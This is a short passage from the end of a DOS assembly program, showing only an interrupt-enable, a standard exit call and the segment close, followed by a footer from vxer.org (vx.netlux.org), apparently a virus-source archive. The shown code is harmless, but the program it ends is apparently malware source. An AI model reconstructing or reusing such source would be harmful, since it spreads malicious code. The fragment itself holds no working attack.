	     sti
 
	     mov ax,4c00h
	     int 21h
CSeg      ends
	  end main
 
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxer.org aka vx.netlux.org
deenesitfrplruua